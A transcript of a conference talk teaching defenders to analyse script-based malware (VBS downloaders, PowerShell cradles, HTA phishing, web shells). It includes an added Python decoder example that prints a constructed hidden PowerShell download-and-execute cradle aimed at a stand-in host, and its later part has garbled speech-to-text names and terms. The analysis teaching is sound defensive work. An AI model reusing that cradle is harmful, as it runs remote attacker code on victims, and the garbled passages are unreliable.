
All right, so our next talk is No Disassembly Required, Brian Cetera with readout.

Okay, I was like, can you still hear me? Is that all right? Well, we'll try this microphone, and if it doesn't work I'll switch back to the other microphone. Okay, if somebody can grab the doors.

So I am Brian Cetera, and this is No Disassembly Required, which is a terrible pun and fully intended. The subject of this talk: we'll be talking about script-based malware, but it's also going to be kind of an exhortation, if you're not a malware analyst, to not be afraid to start doing malware analysis. So I'll talk a little bit about some VBS malware, talk about some offensive PowerShell, and some other types of script-based malware.

The important parts up front: you can follow me on Twitter, readout with a three. I've got a home page; I have an open source project that I'm working on, and we're starting to get it up and running. Over the past year I've done a lot of macOS-related security stuff; there are some free scripts up there for hardening macOS and some other materials related to that, previous talks I've given, and you can follow me on my blog at blog dot readout dot io, again with a three, which currently is mostly macOS security-related stuff, if anybody's interested in that, and using osquery for EDR, some tutorials up on that. But the stuff from the training yesterday and from this talk will be going up on there as a series of blogs, hopefully soon.

So a little bit about me. Not really; I usually like the idea that a talk should stand on its own. I don't believe in the lab-coat commercial philosophy, right, "well, I'm standing in a lab coat, so buy our product." But just because people have asked me, like yesterday at the training that we did, how did you become a malware analyst, or how do I become a malware analyst, or how did you get started in security, a brief bit of background.

So I originally, after I got out of the military, went back to school on the GI Bill. The University of Pittsburgh had an information security program at their School of Information Sciences, a graduate program, and I went back to do that. But I really ended up getting into what I do now by doing an internship with NCFTA, and I know there are some people here today with NCFTA, or NCFTA alums as well, where I got to work with federal law enforcement and see what they do, and started just learning by doing, right. So way before your tax dollars paid for me to go to a $5,000 SANS course with Lenny Zeltser (thank you) as a government malware analyst, I was just learning by doing as a guy working as an unpaid intern who was told, go learn C, go write a Hello World C program, compile it, and throw the assembly in IDA Pro or Olly and see what it does.

Since then I've done kind of an infosec jack-of-all-trades, plus some background in intelligence as an intel analyst, so I've helped stand up some threat intel programs and done a variety of other things too. But I consider myself mainly a reverse engineer. I say reverse engineer instead of malware analyst in part because I've probably spent my work 50/50 working on industrial control systems and embedded stuff from a vulnerability analyst standpoint, some of it more offensive-oriented, but also it's kind of a philosophical point, in that I think it's more than just bug hunting, or in the case of malware analysis, throwing something in a sandbox and finding quote-unquote IOCs, getting indicators of compromise. It's really understanding what does something really do: not what the person who wrote the code thinks it does, not what you originally thought at the outset, but what can it really do, what does it really do, how does it really work. And that's kind of the essence of hacking, right, is discovering what things can really do.

Is this talk for you? So, by a show of
hands, regardless of what your job title is, how many people here have ever, or on a relatively routine basis, get asked to look at phishing emails? Okay. How many people get asked to do sort of EDR, even if it's just, you're Joe Helpdesk and, hey, go reimage this box? Right, okay. Now out of all those people, feel free to put your hands back up and put them down, how many of you, if this is not the case, how many of you, your company just says, oh, you want to go take a $6,000 SANS course, or you want ten grand to go fly out to Vegas to go to Black Hat, no problem? Anybody? Anybody? So a few people, and I've been lucky enough that I've had companies, both working on the government side and certain companies that I worked for, where I had the opportunity to do that, usually because I controlled a budget myself to go do that. But not everybody does, right. And out of all the people who raised your hands, how many of you, your actual title is malware analyst? Okay, so not as many, right.

So the point I'm trying to get across with this talk is just, maybe you don't know where to start. Maybe your idea of malware analysis is, well, I'm not a malware analyst, I don't have the right tools and/or the right environment, I don't have the training, the certifications, I can't really do anything other than just throw stuff in a sandbox. And really all you need is curiosity and persistence, and the persistence is not to be underestimated, right. Unless you have the persistence, almost to the point of masochism, of I'm gonna do a really hard sudoku puzzle or crossword puzzle and get to the end and realize I have to start over; that's the type of persistence I'm talking about. You really just have to want to learn.

And I would say, bottom line up front, for anybody who suddenly has to go take a phone call or whatever, you know, like they always say, tell people what you're gonna tell them, and tell them, and then tell them what you told them: start with script-based malware. This was an epiphany that I kind of had, but really all credit to a friend of mine and former coworker, one of the better malware analysts I've known. We were talking and had the epiphany that, you know, ten years ago, or if we could tell somebody today where you should start, you have one day to train somebody, that sort of thing, that we would have, before we did the whole learning C and Windows API and Windows internals and spending a lot of time staring at assembly in IDA, we would have started with script-based malware, or scripts, right. So it's just sort of the most bang for the buck.

The second point I would make is that it's not magic, it's just code. So even if you say I'm not a developer, I've never written a line of code in my life, write a Hello World script, pick a scripting language, and if you already know something, stick with that; I guarantee you there's malware written in it. I mean, how many people here are Lua developers? Nobody, right. Can anyone here, by show of hands, even say you're familiar with anything vaguely important written in Lua? It's like maybe a handful of people, and out of any of those people, is your answer not World of Warcraft mods? The other thing would be a bunch of Stuxnet and some related implants. There's been plenty of malware written in Lua, and it's a pretty obscure language.

It doesn't require any special software, right. Literally all you need is a VM and Notepad or some text editor, and you can analyze script-based malware. It's not going to be the ideal environment; maybe there are some other things that would help, but you guys are going to see that's really about as basic as it gets. And you're smarter than a sandbox. So if I had a single tagline for this talk: you, as a team or as a defender, regardless of what you think you're capable of doing, you are smarter than a sandbox. And malware authors aren't stupid, right. They're putting in all sorts of anti-forensics; they might have fake call-outs, they might have a wait that you don't know about, and if all you ever did was detonate something in a sandbox and then go, oh yeah, I got the IPs, we got this domain and that domain, maybe you did, maybe you didn't get the right payload, maybe you didn't get the right C2. You might not actually know that unless you've really looked at the malware and done some manual analysis. And that's not to say that automation doesn't have its place, right, for triage and things like that, but it should be the first step, and just that triage step, right.

Okay, so enough on the soapbox. I said that this was gonna be your best bang for the buck, so this is kind of the Pareto principle. Anybody here familiar with the Pareto principle? Maybe a few people. So this is Vilfredo Pareto; he was an Italian economist, clearly a wise and incredible man based on his beard. It's actually an apocryphal attribution that I've only ever heard from people with MBAs or from a business school background. As somebody with an economics degree once upon a time, you know, it's not an actual economics thing, and they think that it's an apocryphal attribution by an engineer. He did come up with Pareto optimality, which is a real thing in like game theory, but that's a whole other talk, my other nerd-out area of expertise.

So the idea is 20% of effort to get 80% of the return, right. So why not do that up front and start seeing an immediate ROI? When I train interns, or I've trained new malware analysts, this is now my standard approach, because I can get them immediately doing useful work and feeling confident and feeling like they know how to do something, rather than having somebody stumble around learning assembly.

So phishing email attachments, drive-by downloads, living-off-the-land activity; how many people have heard that buzzword, right, that's sort of been the flavor of the month for a lot of months now. So scripts, what are they good for? Everybody here familiar with the MITRE ATT&CK model or the Lockheed Martin Cyber Kill Chain, whatever model you want to use to look at attacker behavior: most of your stages or activities are something that an attacker can do with script-based malware of some sort, without portable executable files, in many cases today maybe doing without
compiled binaries, just because of that living-off-the-land principle of using components that are going to be whitelisted, things that are going to be found tools that systems administrators use, and so on and so forth.

So let me start by getting into VB, right, into an example of this, and that's Visual Basic scripting and phishing emails. It would not be a malware talk without a little bit of the Wayback Machine, talking about malware that nobody remembers. Maybe some people in the room do remember ILOVEYOU. It was one of the first really big phishing email campaigns, like a mass mailer sort of thing, and it was just two students from the Philippines who wrote this in VBS. This is just a part of the code, the main method, or the main function and sub in the script, but it's estimated it affected something like forty-five million users around the world, unintentionally; this wasn't really a deliberate part of what the malware was supposed to do, but it was just so successful that when it was going around looking in people's Outlook contacts and then mailing copies of itself as an attachment, as a phishing attachment, it ended up crashing Outlook servers and being like a denial-of-service attack on huge companies and governments around the world. And it was pretty malicious, despite the claims of the two students that wrote it: it looked for documents and other specific file extensions and overwrote things, so it was pretty disruptive.

The point is, it was written in VBS, and it was written in VBS with API code, standard code, that is still around in Windows 10, or some version of it. It might be a new CLSID and a new version of something, but the same COM objects are still to be found on a Windows system today. And so in terms of that MITRE ATT&CK, we're talking about initial access, we're talking about initial delivery and installation; this stuff is still around today. I've looked at phishing emails in the past year that were not really that different from something like the ILOVEYOU worm, other than the fact that they were heavily obfuscated, which it did not have to be because there wasn't anybody looking to detect it. So eighteen years later it's still going strong, which in a certain sense is kind of depressing; in another sense, though, I think it kind of makes the point that I was trying to make about the value of starting with scripts, and that learning something very simple can help solve a lot of problems, or help give you a lot of capability.

So today, primarily, you're gonna see these types of VBS scripts used for staging payloads rather than necessarily as the main payload. What I mean by that, for those who aren't familiar, is either droppers or downloaders. So a dropper might have an embedded executable, not necessarily in a VBS context, but remember a couple years ago it was a thing where people were using compiled .NET files and the actual payload was just a variable that contained an encoded or encrypted string, and they were just using it as a carrier file to get around defenses, and specifically as anti-forensics against sandboxes. Downloaders, right, so it might just be a short snippet of VBS using a handful of COM objects to go out and download the real payload, and the real payload could be scripts too.

So why would we do this? This is making things a little bit more complicated than it needs to be. Well, think about it this way: would you rather, if you've got your new cool banking Trojan written in C or C++ or whatever, and it took you six months to write, or you paid for it from some guy in Ukraine who it took six months to write, do you want that to get burned if your phishing email campaign goes sideways? Or would you rather just have a JavaScript downloader that took you a half hour to write get burned, and that be the end of it? And of course cybercrime is a business, and there's not always vertical integration, so I might just be delivering payloads for a client and I want it to be sort of agnostic, right. And then there's defense evasion, which I kind of already mentioned.

So in terms of tools, I mean, really you're just starting with a text editor and a VM. Now I would recommend using more of a full-featured text editor, something like Notepad++, that is intended for developers, especially people who do scripting a lot, where you can kind of set it to a
particular scripting language and it'll highlight all the keywords that it recognizes as being associated with that scripting language. But that's not necessary; you could just use Notepad or something, or gedit or whatever, vi if you're really adventurous. No vi? No Vim fans? Okay, that was a joke. I would smash my hand in a car door before I analyzed anything in vi. Yeah.

So, of course, internet access: we always want to be safe. Don't have your VM set to a bridged or a NAT connection. Ran into this yesterday with the training; there were some folks who really didn't quite get the concept of host-only networks and were asking questions about that. So I'm not trying to oversimplify things, but some people are not clear on that.

I generally don't use real debuggers for most of the script malware, because a lot of it is just simple downloaders, and they're not real extensive. I generally haven't found a super big need to use a full-featured debugger. But if you did want to, if you install Microsoft Visual Studio, there is, with cscript.exe and wscript.exe, an option like //X that you can use to start running a VBS script in a real debugger mode, and I think set breakpoints and things like that. I don't do that. My poor man's debugger is just using MsgBox. So in VBS, and you'll see it in a minute, if you just put things in a message box, you can get an immediate readout, output and feedback, of what the code was doing. Similar thing if you're working with malicious JavaScript, just using an alert box, right.

General strategy for these VBS downloader phishing emails: you've got to first extract it from source, and sometimes this is the hardest part, and that's a whole talk unto itself, a talk for another day, but I'll go through some of it in my example that we have coming up here in a minute. It's generally gonna involve extracting an OLE object, extracting something from a Word document and carving it out, and then getting it into your text editor. Finding unobfuscated code keywords and cleaning up line breaks, generally cleaning up the code: so in VBS the whole script will be shoved together with colons, which act like a line continuation, and breaking those out just so it's more readable. And then, as I said, if you're using something like Notepad++, anything that's unobfuscated, and there's always going to be some code that they've left unobfuscated, it's going to go ahead and highlight that for you, and that gives you a better starting point, right, of determining, hey, this is where a function starts and stops, or something like that, even if I can't read what it does. Sometimes IOCs are just in plain text, as you'll see a little bit later, but as I said, don't believe it, because you don't know what anti-forensics are going on.

Try finding Eval or Execute functions and substituting them with MsgBox. That's the go-to first thing. Maybe 25%, something less than 50%, a sizeable chunk of VBS malware, you can defeat the obfuscation just with that, right, because they're being lazy, they just want to avoid basic detection, and they're just running everything through Eval, and you can do the same thing too and just output the unobfuscated copy of the code with MsgBox. Get rid of obvious garbage functions. Look for the decoder or deobfuscation functions, because they have to be in the sample somewhere; maybe, possibly, if this was a second stage to some other malware, there might be some other component that does the decoding and decrypting, but generally you're gonna have some type of decoder function like that, the simplest method being that Eval statement that's gonna be in the malware itself. So if you can find that first, you can write a quick decoder in whatever scripting language you're comfortable with. It doesn't have to be the same scripting language; I've had people ask me that. Just because I'm looking at VBS doesn't mean that I can't use Python to write my decoder. And especially if you're seeing the same type of thing over and over again, the same type of phishing emails over and over again, you might start to have a payoff to writing those decoders and making them a little more robust.

Identify the really useful bits. It's typically gonna be run-of-the-mill, common COM objects over and over again, you'll see, and we'll see all this coming up in the example. Rename functions to something meaningful and comment your code. This is even more important in malware analysis than it is, I think, in being a developer, because ultimately you have to communicate your results and your information to someone else for your work to be of value, whether that's reporting to management, whether that's talking to threat intel guys who aren't as technical as you are, or whether that's communicating information so you can write a YARA rule or a signature for an IDS or something. So you want to, right off the bat, start commenting your code as you go and renaming things in a way that's gonna help that, and I think something like the MITRE ATT&CK model, or something along those lines, is a good way to standardize your language and terminology when you do that. Establish the sequence of files and processes, note anti-forensics. The only thing I'll hit on here is this last point, it's a little bit of a soapbox point, but observables are not indicators. I once got an Excel spreadsheet from an analyst at a Fortune 500 SOC that was more or less just a big list of IPs, and I was like, did you get those indicators? Yeah. So are these IP addresses hosting second-stage payloads, is this a C2 server, what is this, right? It's that context that makes an indicator an indicator, and actionable. And so again, when you're making your notes and you're saying I'm trying to find IOCs, make sure you're finding actual IOCs and have all the information. Sorry, soapbox point.

So let's go through an example; I think this is going to be a little bit more clear. VBS downloader. So a phishing email was received, forwarded to security at an organization. It was embedded in a Word document, and the Word document was password protected. So, going back to anti-forensics, we had a Cuckoo-based sandbox farm set up that we could throw samples through, and we were actually
more using that for threat emulation and helping develop blue team tactics than for operationally focused malware analysis, but the point is that that kind of broke that model, right; it broke the idea of just detonating it in Cuckoo, even though we had Cuckoo sandboxes set up with Word and Office in them and we typically could just detonate Office documents and get information. So how to: I used an MS Office password removal tool; there are a number of them out there, this is just a free one that I think has a GitHub page, and then carved out the script from Word. In this case it was easy enough to do once it was decrypted, once the password protection was removed, to do it with a hex editor, but you may do that with some other tools like Boldewin's OfficeMalScanner, or the Decalage site, I forget the actual name of the tool, but the site is decalage, that has the OLE extractor tool there; you can Google for them. And then it was just a matter of starting the basic cleanup. As I said, to focus on the actual script part; that first part is sort of its own art form as well.

On the right here you can see the obfuscated copy where I've just done an initial cleanup of breaking out those line continuations so that it's a little bit more readable, and you can see that Notepad++ has identified functions. So I'm able to say, okay, this is a function, here's the name of the function; it's not a human-readable name, it's sort of a garbage name, but I can highlight that and then search to see, is this function even called anywhere else in the script? And if not, it's probably just garbage code there to distract me, and I can delete it out, at least out of a copy of the script, and start working from that assumption, and I'm gradually reducing the stuff I actually have to look at, right.

So after I've eliminated some of the garbage code, I'm going through deobfuscation. So I've identified this function, which you can see up there, which is actually three functions that were the main obfuscation functions, or I should say deobfuscation functions, to undo what they had done in the script. The top one was just a modulus function that they implemented themselves for some reason, probably just to avoid having that VBS keyword in the file in plain text. I don't really know, but that's what they did, and they just did some math operations on strings that they had converted from a character to the number value of the character, so they were doing math operations on them. An XOR function that they did, that they were using, well, we'll see what it was used for in a second. And then the main decode function that was used for the main obfuscation of the body of the code. And so then from there I was able to take that main deobfuscation function and write a quick decoder and start clearing up the useful code that actually did something and wasn't junk code.

As I said, I came up with some fairly common COM objects. So in this case they're creating an XMLHTTP object; typically you're gonna see either that or you're gonna see an Internet Explorer object being created, sort of as a headless browser, to go out and pull down some other content, and that's a pretty good indication, or potentially to push information up to a C2 server, but more often, as in this case, it's a downloader. And yeah, I don't know if you can see this, but in the Open statement they're using a GET request method, and then that qv70 variable, which I probably should have renamed for this screenshot for everybody, but that was the URL. So I was then able to find they had a function that was essentially doing a URL chooser. It wasn't exactly like a domain generation algorithm; it was just choosing from a list of hard-coded URLs to use, and there were some anti-forensics measures beyond that, like wait times and things like that. So if I'd just thrown this into a sandbox and rolled with the first thing I got, or had been running FakeNet-NG or something, I might have gotten a domain name that wasn't even being used actively by the attacker, I may have gotten one that was no longer being used, or whatever the case may be. I would not have gotten all of the URLs; I got all of those out of the file.

And then the XOR function, as was actually discovered, was not being used. You can see this at the bottom: there is a selection mechanism for what byte key to use. And just to level set here for everybody, if you're not familiar, XOR is one of the more common methods of obfuscation, simple obfuscation, that people use. It's pretty convenient because, as I said, whatever you do, you have to undo, so if I have converted things to a number and then I XOR, if I XOR a byte stream by some byte key and then I XOR it again by the same byte key, I get back the same thing I started with.
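The workflow described above (find the string that reaches Execute or Eval, reimplement the sample's decoder in whatever language you like rather than in VBS, pull every hard-coded URL and COM object out of the result, then undo the single-byte XOR on the fetched second stage) as an added Python example. This is not the speaker's sample or code: the obfuscated VBS below is constructed for illustration, and its shift-by-7 hex encoding, the garbage function names jx9a and qq, the example.invalid URLs, the XOR key 0x5A and the second-stage string are all assumptions rather than anything recovered from a real phishing email.

```python
"""Added example, not the speaker's code or sample: reimplementing a VBS
downloader's decoder outside VBS and undoing a single-byte XOR on its
second stage. Every input below is constructed for illustration."""
import re

SHIFT = 7  # constructed: the sample adds 7 to each character before hex-encoding it


def vbs_encode(plain: str, shift: int = SHIFT) -> str:
    """The attacker-side encoder; used here only to build the constructed sample."""
    return "".join(f"{(ord(c) + shift) % 256:02X}" for c in plain)


# Constructed "real" body that the sample hides and eventually hands to Execute.
STAGE1_BODY = (
    'Set o = CreateObject("MSXML2.XMLHTTP")\n'
    'u = Array("http://stage.example.invalid/a.bin", "http://cdn.example.invalid/b.bin")\n'
    'o.Open "GET", u(Int(Rnd * 2)), False\n'
    'o.Send\n'
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'Set sh = CreateObject("WScript.Shell")\n'
)

# Constructed obfuscated sample: the body lives in a variable, is decoded by a
# garbage-named function that uses a hand-rolled modulus (qq), then Execute'd.
SAMPLE_VBS = f'''Dim foo
foo = jx9a("{vbs_encode(STAGE1_BODY)}")
Execute foo
Function qq(a, b)
  qq = a - b * Int(a / b)
End Function
Function jx9a(s)
  Dim i, r
  For i = 1 To Len(s) Step 2
    r = r & Chr(qq(CInt("&H" & Mid(s, i, 2)) - {SHIFT}, 256))
  Next
  jx9a = r
End Function
'''


def find_decoder_input(vbs: str) -> tuple:
    """Locate the literal fed to the decoder whose result reaches Execute/Eval.
    This is the manual 'swap Execute for MsgBox' step, done statically."""
    m = re.search(r'(\w+)\s*=\s*(\w+)\("([0-9A-Fa-f]+)"\)', vbs)
    if m is None:
        raise ValueError("no decoder call with a hex literal found")
    var, func, blob = m.groups()
    if re.search(rf'\b(Execute|Eval)\s+{var}\b', vbs) is None:
        raise ValueError(f"{var} is decoded but never executed; likely garbage code")
    return func, blob


def decode_stage1(blob: str, shift: int = SHIFT) -> str:
    """Same arithmetic as jx9a/qq: hex pair -> minus shift -> mod 256 -> Chr."""
    return "".join(chr((int(blob[i:i + 2], 16) - shift) % 256)
                   for i in range(0, len(blob), 2))


def extract_urls(script: str) -> list:
    """Every hard-coded URL, not just the one a single sandbox run happened to pick."""
    return re.findall(r'https?://[^\s"\']+', script)


def com_objects(script: str) -> list:
    """The handful of COM objects that tell you what the script can actually do."""
    return sorted(set(re.findall(r'CreateObject\("([^"]+)"\)', script)))


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR is its own inverse: the same single-byte key undoes what it did."""
    return bytes(b ^ key for b in data)


def recover_xor_key(blob: bytes) -> int:
    """Fallback when the key-selection routine can't be recovered from the sample:
    rank all 256 keys; the right one yields printable text with the most
    lowercase letters and spaces. Prefer the real key from the script when you have it."""
    def score(k: int) -> int:
        out = xor_bytes(blob, k)
        if any(not (32 <= b < 127 or b in b"\t\r\n") for b in out):
            return -1
        return sum(b == 0x20 or 0x61 <= b <= 0x7A for b in out)
    return max(range(256), key=score)


# Constructed second stage and its XOR'd form, with key 0x5A standing in for
# whatever byte the sample's selection mechanism would have chosen.
STAGE2_PLAIN = (b'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                b'.DownloadString(\'http://cdn.example.invalid/b.ps1\')"')
STAGE2_BLOB = xor_bytes(STAGE2_PLAIN, 0x5A)


def analyze(vbs: str = SAMPLE_VBS, stage2: bytes = STAGE2_BLOB) -> dict:
    """Run the whole manual workflow and return what would go into the report."""
    func, blob = find_decoder_input(vbs)
    body = decode_stage1(blob)
    key = recover_xor_key(stage2)
    return {
        "decoder": func,
        "stage1": body,
        "urls": extract_urls(body),
        "com_objects": com_objects(body),
        "xor_key": key,
        "stage2": xor_bytes(stage2, key).decode("ascii"),
    }


if __name__ == "__main__":
    for name, value in analyze().items():
        print(f"{name}: {value}")
```

Run the file directly to print each stage. The key ranking in recover_xor_key is only the fallback for when the sample's byte-key selection can't be followed; when it can, reimplement it the same way decode_stage1 mirrors jx9a and qq, since a ranking heuristic will mislead you on binary or non-English payloads.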
Right, it's kind of convenient that way. So this was just their method of decoding the payload that they were going out and getting. So in order to decode this payload, I would go out and curl the second stage, or use some manner to go out and get the second stage. And if you're gonna do that with curl, kind of keying on the red team talk that just happened, you know, you can use tools like curl and set up your own profile so that you're not just using the default header; that's basic practice, you should be creating a spoofed header with a spoofed user agent and all that stuff, so that you don't look like a blue teamer going out and getting a second-stage payload. You look like a dick, yeah.

So then I was able to decode the second-stage payload. Lessons learned: dynamic analysis would have missed stuff. You need those XOR keys; I was able to recover those. And it's just reuse of basic COM objects, a handful of COM objects. You can see the FileSystemObject in the second part, and typically some type of WScript.Shell object, because you can use those to do a headless command line and run files, run files with an argument to them, that sort of thing, edit registry keys, so on and so forth. So if you learn, in JavaScript let's say, or VBS, you learn the example, you look at SS64.com or MSDN and you look at APIs and you look at how to use a basic set of maybe four or five different COM objects, the ones I just named being most of them, you can add the ADODB.Stream object to the others, you can pretty much understand and identify the important parts of the vast majority of VBS or JavaScript downloader phishing email code that you're gonna look at. So you don't have to be a hundred percent proficient expert in VBS; you just have to be able to recognize those important parts and kind of understand how they work.

This was just some stuff that I think I've already kind of covered about string manipulations and character manipulations with Asc; you would see the opposite of it, the undoing of it, done with the reverse of that, with Chr, the character function, to get it back to a character. That's an example: this Dim foo; they're just storing in that variable the whole script as one big long string and then running it through Execute. And so this is one of those cases where, as I said, if I just substitute Execute with MsgBox, I get the deobfuscated script.

So rolling right along, PowerShell scripting. I'll try and knock through this; I'm sure everybody here is familiar with PowerShell. Anybody not familiar with PowerShell? Right, no, okay, good. So the basic idea was a more Bash-like experience, more powerful for systems administration features than cmd.exe, above and beyond. 2012 was sort of the year of PowerShell. I mean, PowerShell came out in 2006, but the offensive PowerShell use really kicked off in high gear in 2012 with all these big talks at Black Hat and DerbyCon and DEF CON, all the conferences. Dave Kennedy and Josh Kelley, I think there's actually another "e" in his name, I misspelled it, doing their talk, that OMFG
talk at Black Hat. Matt Graeber. You had tools coming out like PowerSploit, followed by Empire and Nishang, and so on and so forth, and red team has really sort of led the way on this philosophy and this living-off-the-land methodology. But the advanced persistent threat actors, and various actual malicious actors, have adopted the same techniques because they work, because there are all of these legitimate infosec professionals doing all the development work for them. And this chart on the right was just to show that, again, with PowerShell we can do pretty much all the stuff that we need to do, especially in that middle box, which is the sort of actions-on-objectives in the Cyber Kill Chain terminology; this is where the offensive PowerShell really shines, right, lateral movement, privilege escalation, so on and so forth.

So how many people here have not heard that you might live off the land, or fileless intrusions? Usually it's in the sales pitch of some vendor who claims they can detect it and defend it and defeat it and make you a cappuccino. Living off the land, how I sort of interpret it, is using whitelisted applications, tools, scripting engines, stuff that your admins use, so that it doesn't look unusual. You're making a smaller footprint; you're making a smaller footprint for EDR, fewer artifacts on the endpoint, you're not writing as much stuff to file, and you also have fewer artifacts you're downloading that are gonna be in network traffic. Fileless intrusion, I think, to the extent that it has a meaning beyond a buzzword or a sales pitch, is just this idea that we're writing fewer artifacts to disk, and PowerShell is sort of uniquely capable of that because of the remote management features it has. So I can run a PowerShell script on my system, or on a system that I'm using as a pivot point, and run it on a remote host, and it's not gonna write the file to disk on that system; it's gonna be in memory, and maybe, if they have script block logging enabled, they're gonna catch it in script block logs, like a Windows event 4104, which I'll get to in a second here.

And so these are some of the basic methods that you commonly see. Again, one of the advantages is, with Invoke-Command, you can run this not just against one target, you can run it against multiple target hosts. The term cradles: I'm sure people here have heard the term PowerShell cradles and wondered exactly what that means other than jargon and buzzwords. This came out of a talk in 2015, Flying a Cylon Raider, which you can read the PDF version of from SANS. This is a great example you're commonly gonna see, right: this Invoke-Expression, which is aliased, and then creating a .NET WebClient. I kind of had in my previous slide, you've got access to everything in .NET natively, and commonly we're going to use the DownloadString method instead of the DownloadFile method, just because it allows me to do that grabbing of a remotely hosted PowerShell script and running it without writing it to disk first on the local system. And of course other tools were adapted to take advantage of that, so the Invoke-Mimikatz version of running Mimikatz.

Kind of putting this in context, where you may see stuff like this getting used if you're looking at phishing emails, since a lot of people said that they looked at phishing emails, would be HTA files. Anybody here run into malicious HTA phishing emails? I see a few heads nodding and some people putting hands in the air. Yeah, so in 2017 there was CVE-2017-0199, which really wasn't a bug or anything, it was just Microsoft functionality and how it could be abused, which is always the best part, and that's why I said in the beginning of my talk, reverse engineering is more than just finding a bug, right; sometimes it's a feature. And this allowed HTA files to just be opened in a Word file, and was billed as macro-less exploitative Word documents with HTA. This has since been closed down, that loophole has sort of been closed down by Microsoft, but there are still other methods to execute HTAs, and it's still used by attackers. One thing is it's a defense evasion measure, because you're using a whitelisted legitimate application, mshta.exe, to launch some other malicious content. To look for this, by the way, in Windows event logs: 4656 queries to HTA-related CLSIDs, and your 4688 process creation from mshta, would be one way to start. This is an actual malicious HTA downloader, courtesy of Nick Carr, the daily scriptlet guy, if anybody follows him, I would recommend it, that he got emailed from somebody else, another malware researcher. And it's just kind of humorous, because this is how not to obfuscate an HTA file or any other malware. So you can see some of the similar stuff you saw in the earlier VBS script, but they've heavily obfuscated it, they're using PowerShell in sort of the middle part for the downloader, there's a PowerShell cradle, and then they've decided, for some reason, not to obfuscate the IOCs, the stuff that we would really be looking for, right. And you would still want to go ahead and you
obviously this just to make sure that this isn't messing with you and some sort of anti forensics but this gives you a good look at what the functionality would be so I've got my HTML and then enclosed within my HTML I've got a VB script and the vbscript is really being used to do the filing handling of writing and running the file which they're temporarily storing into an environmental variable and then pulling it back out again and the actual downloading is being done with with the download file method of that dotnet web client object why they chose to do this instead of doing a one-liner with the download string I'm not 100% certain but that's what they did so again it's not
too different from what you saw in the earlier VBS file but they're using PowerShell for that download or cradle we could sit here and talk for an hour just about or more her weeks well I couldn't because I don't know a week worth of material but there are people who do like Daniel Bohannon hunt powershell obvious gation it's a lot of the same games you know there's aliased expressions or aliased commandlets base64 encoding as you can see on the right using tick marks concatenations your dash F format feature is a really common string manipulation you see with the powershell and at the end of the day there's - there's too many to cover over here the end of the day the big point I
would make is just that it led to this PowerShell arms race and you had the top some really top researchers like Daniel Bohannon from a Myint and the ALMS with Microsoft and Microsoft Azure who was one of the people who who originally wrote PowerShell script in PowerShell getting into this this cat and mouse game with who could create even more complicated obvious caissons and Microsoft introducing security features with each version of PowerShell so that's really behooves you to use five five one or if you're getting into using Linux systems as well version six engine because it built in just enough administration script lock logging and so forth and on the left you can see that script lock being caught
with a 401 for when it is event log which you would not catch if people were running their PowerShell your administrators or using like v2 of PowerShell or the attacker has successfully downgraded to v2 and so that becomes another thing to look for as you're looking for the downgrade instead of instead of the malicious activity itself at least as a starting point and then of course you have the end of the PowerShell arms race cold war with damn Bohannon and Lee homes coming together in 2017 and doing like the revoke obvious Gatien and revoke obvious ocation talks and that's a really useful tool that I would recommend and basically their point that they arrived at was that it's so hard to
manually do view skate some of the stuff you can create in terms of PowerShell obvious keishon that you almost need to adopt more of the logs and statistical analysis based approach and that's a part of what their tool does is it facilitates that and reassembling scripts that span multiple logs other malware really quick since we are are ticking down the clock I thought I mentioned this one Mac OS malware so this just shows you the scope of what you can do just looking at script malware so last year 2017 one of the big big news items in Mac OS malware if people follow that stuff Patrick Wordle I would also recommend like Chris Chris Ross from Spectre ops is a good guy on
that stuff was this fruit fly malware as they called it and you had all these InfoSec blogs and researchers who rushed out this is clearly some never-before-seen really stealthy apt actor who was targeting very specifically the biotech sector and in these complicated theories based on what was found on this professors laptop and this university and so on and so forth and of course as it turns out it was really just this disgruntled software engineer from Cleveland and named filthy Phil juror chin ski and he has not been convicted but he has been charged with 16 counts of everything you can do naughty with a computer and he was probably a Browns fan so is this really
surprising ah you know so the point is is that he infected systems like at police departments and on US government systems and had persistence for years on some of the systems as far as anybody could tell why he was using one of the most low-hanging fruit no pun intended persistence mechanisms you can use on Mac OS which is just a P less item in the uhland long n launch D um but nobody was looking for him and nobody really knew how to look for him and nobody was analyzing his Mauer and it was just Perl script so he was able to create a completely workable rat entirely in Perl script so there you go and in really old
libraries of Perl script that was that was what people's interest they thought it was some sort of anti forensic stealth measure or something that he was using out of date code malicious JavaScript that again that's a whole week worth of material I would refer you to a wasp I think there was like kind of a new hospital this morning but you know JavaScript was intended to be able to do client-side dynamic content for web content and so you can just as easily dynamically create bad stuff right and tiny web shells same thing last ditch effort backdoor doing government work I've seen this a lot with apt actors targeting government organizations that is their backdoor of last resort after
they've been kicked off a network is leaving behind you know it could be as small with like China chopper is a 4k file with just a simple PHP PHP code in it to receive commands and run commands on the web server and it's just a toehold it's just you know propping open the back door while you ransack the house just in case right so my final caveat I'll leave you with so I would say that it is the 20% that gets you the 80% looking at Script malware and I would encourage everybody to start there but if you're going to be a full time our analyst if you want to go work in a shop where all you do is
sit and go through a queue of malware sample after our sample you probably do want to get your gram if you can you want to learn see learn C++ and assembly maybe even our arm as opposed to just x86 64 you're gonna start looking at like Android malware or something and start to recognize control flow so write your own hello world file compile it in different compilers and then look at the difference in the assembly when you open it up in ida pro or a ladybug and you'll see the differences that are just artifacts and pilers right what is the calling convention who call you know who cleans up the stack is it the calling
function or is it the colleague that's gonna vary from compiler to compiler that's ocean Lotus rat it's a Mac OS mock Oh binary in Ida just a random gratuitous this is some water shot you have to have one of those in the malware talker it's not a malware talk learn file formats like I said you learn to use disassemblers and debuggers but start with scripts and for most of us who your job title is not an hour analyst but you're you are a maori analysts you're being asked to do it you're being asked to look at malicious phishing emails take take a look at a time and if you you know if you're able to remove the time and and just start
scripting start writing scripts and looking at your own scripts start with those basic calm calm functions or comma objects so they talked about like the ones that create web objects XML HTTP and how to do that or the Internet Explorer object and so again it's not magic it's just code all you really need is a VM in a text editor and some persistence and you are smarter than a sandbox so you can do it and I wish it was as easy I love Dilbert but I wish it was as easy as you know just getting a software engineer to write an app for that but there's no magic bullet it's just persistence of doing it that's
